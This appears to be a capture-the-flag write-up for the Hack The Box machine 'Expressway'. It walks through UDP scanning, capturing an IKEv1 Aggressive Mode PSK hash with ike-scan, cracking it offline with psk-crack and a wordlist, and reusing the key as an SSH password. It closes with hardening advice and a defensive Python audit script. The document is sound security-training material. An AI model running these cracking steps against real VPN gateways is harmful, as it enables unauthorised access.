
Expressway — HTB Writeup

Platform: Linux
Host: 10.129.113.8
Difficulty: Easy
Author: NoSec

Recon

First shot, as usual: a quick TCP port scan. If you only see one or two ports open, don’t chill yet — a lot of “quiet” boxes keep the interesting stuff on UDP.

nmap -sVC 10.129.113.8
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 00:22 CEST
Nmap scan report for 10.129.113.8
Host is up (0.033s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.46 seconds

Only SSH shows up, which by itself is meh. This is the point where people start brute-forcing — don’t. Check UDP too: VPNs, TFTP, DHCP, DNS, etc. love to hide there.

nmap -sU --top-ports 100 10.129.113.8
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-21 00:23 CEST
Nmap scan report for 10.129.113.8
Host is up (0.15s latency).
Not shown: 96 closed udp ports (port-unreach)
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

Nmap done: 1 IP address (1 host up) scanned in 141.66 seconds

Why does this matter?

  • UDP/500 (ISAKMP) and UDP/4500 (NAT‑T) scream IPsec / IKE. If the server is on IKEv1 Aggressive Mode with a PSK (pre‑shared key), you can crack it offline. That’s gold.
  • UDP/69 (TFTP) often hosts device configs (routers/APs). Not the main lead here; the real win is IKE.

So we throw ike-scan at it.

ike-scan -M 10.129.113.8
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.113.8    Main Mode Handshake returned
        HDR=(CKY-R=04ec1a9db3726275)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.042 seconds (24.00 hosts/sec).  1 returned handshake; 0 returned notify

Main Mode confirms PSK and the retro suite (3DES/SHA1/modp1024). Promising, but Main Mode alone won’t hand you an offline‑crackable blob. We want Aggressive Mode.

ike-scan -M --aggressive 10.129.113.8
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.113.8    Aggressive Mode Handshake returned
        HDR=(CKY-R=261e81de0f8d9a62)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.545 seconds (1.83 hosts/sec).  1 returned handshake; 0 returned notify

What exactly are we seeing?

  • ID=ike@expressway.htb: that’s the peer ID (user FQDN). In Aggressive Mode the server throws the ID early, and combined with other params that’s enough to compute/verify the PSK hash offline.
  • Hash(20 bytes): the verification hash derived from the PSK, ID, and IKE params. If you guess the PSK and compute the same hash → you win.

Next: dump a crackable blob for psk-crack. We also pass the ID so the tool uses the same context the server did.

ike-scan -M --aggressive --id=ike@expressway.htb 10.129.113.8 --pskcrack=psk.txt

Now hit it with a wordlist. I used vanilla rockyou here, but feel free to go aggressive with rules/hybrids/custom lists.

psk-crack -d /usr/share/wordlists/rockyou.txt psk.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freak<PASS>" matches SHA1 hash 5d6232c869d1<HASH>
Ending psk-crack: 8045040 iterations in 8.402 seconds (957533.11 iterations/sec)

Why does this work?

Aggressive Mode + PSK is just a bad combo. The protocol leaks enough right at the start to let you brute offline, so you’re not hammering the box — you’re crunching locally for as long as you want. If the PSK is human (in a list or hit by a rule), it breaks.

Pro tip: if psk-crack doesn’t land, hashcat supports this too (Mode 530: IKE Aggressive Mode PSK). Slap on rules (best64, dive, hob0rules, etc.) and your hit rate will be way better than plain rockyou.

Cool, we got the PSK. Now what? In labs and in real life you’ll often see password reuse: the VPN PSK (or a flavor of it) is also an SSH user’s password. Same story here — that string worked for the ike user. Log in, grab the user flag, done.

If it doesn’t line up for you: enumerate usernames first (services on the box, configs, banners, domain/realm, or the ID straight from the handshake like ike@expressway.htb), and try the PSK with those. If creds are totally different, UDP/69 (TFTP) or other services’ logs/configs can leak more hints — wasn’t needed here though.

# (ssh login and user flag retrieval happened here – commands and outputs are intentionally omitted)

TL;DR

  • Only SSH on TCP? Don’t stop. Run a UDP scan. That’s where the win was.
  • UDP/500 + 4500 → IKE/IPsec. If it’s Aggressive Mode + PSK, do an offline PSK crack.
  • ike-scan conveniently printed the ID (ike@expressway.htb), exactly what you need for a valid hash context.
  • psk-crack (or hashcat m=530) tears through a weak PSK.
  • Password reuse: the cracked PSK often doubles as SSH creds. That’s your user foothold.

If it’s not working, try this

  • No Aggressive Mode response?
    Try --aggressive --id=<something@domain> with different IDs (hostnames, users, email-ish strings). Some stacks only talk nicely for certain IDs.
  • PSK won’t crack?
    Switch to hashcat (m530), add rules, and bring a custom wordlist (company/box names, seasons/years, punctuation, 123, etc.).
  • PSK doesn’t log you into SSH?
    Check the environment: UDP/69 TFTP, /srv/tftp, config backups; or local user lists/crumbs. Same patterns often pop up elsewhere.

Blue-team notes (why this box is “easy”)

  • Don’t deploy IKEv1 Aggressive Mode with PSK. Seriously. If you must, use a long, random PSK (not in any wordlist), but really just go IKEv2 with certs.
  • Avoid password reuse. VPN PSK ≠ SSH user password.
  • Trim UDP services. Don’t listen on stuff you don’t need (TFTP is especially spicy).
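As an added, defender-side example (not part of the original writeup or of ike-scan itself): a small Python audit that parses ike-scan output in the format shown above and flags exactly the conditions this box relied on, covering both the “What exactly are we seeing?” breakdown and the blue-team notes. The sample transcript is the page’s own Aggressive Mode output, trimmed; the “legacy algorithm” baseline in WEAK is an assumption, not a fixed standard.

```python
import re

# Sample input: the Aggressive Mode transcript shown earlier on this page, trimmed
SAMPLE = """\
10.129.113.8    Aggressive Mode Handshake returned
        HDR=(CKY-R=261e81de0f8d9a62)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        Hash(20 bytes)
"""

# Algorithms a VPN owner should no longer be offering (assumption: a typical org baseline)
WEAK = {"Enc": {"DES", "3DES"}, "Hash": {"MD5", "SHA1"}, "Group": {"1:modp768", "2:modp1024"}}

def parse_ike_scan(text):
    """Return one dict per responding host: mode, SA parameters and disclosed ID."""
    hosts, cur = [], None
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+(Main|Aggressive) Mode Handshake returned", line)
        if m:
            cur = {"host": m.group(1), "mode": m.group(2), "sa": {}, "id": None}
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = re.search(r"SA=\((.*)\)", line)
        if m:  # SA=(Enc=3DES Hash=SHA1 ...) -> {"Enc": "3DES", "Hash": "SHA1", ...}
            cur["sa"] = dict(kv.split("=", 1) for kv in m.group(1).split())
        m = re.search(r"ID\(Type=\w+, Value=([^)]+)\)", line)
        if m:  # the peer ID the responder sends in the clear during Aggressive Mode
            cur["id"] = m.group(1)
    return hosts

def assess(host):
    """Map one parsed handshake to the findings to fix, worst first."""
    findings, sa = [], host["sa"]
    if host["mode"] == "Aggressive" and sa.get("Auth") == "PSK":
        findings.append("IKEv1 Aggressive Mode with PSK: responder hash is crackable offline")
    if host["id"]:
        findings.append(f"peer ID disclosed in the clear: {host['id']}")
    for param, bad in WEAK.items():
        if sa.get(param) in bad:
            findings.append(f"legacy {param}={sa[param]}")
    return findings

if __name__ == "__main__":
    for h in parse_ike_scan(SAMPLE):
        print(h["host"], h["mode"], "Mode:")
        for f in assess(h):
            print("  -", f)
```

Point it at the saved output of ike-scan against your own gateway; a Main Mode responder with a modern suite and non-PSK auth produces no findings.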

Takeaway

This is a textbook “TCP looks boring, UDP prints money” situation. A bit of protocol clue (how IKE Aggressive Mode behaves) + a basic wordlist = user shell. Don’t overthink it — right order only: UDP scan → ike-scan → PSK crack → SSH. Ship it. 🏴‍☠️
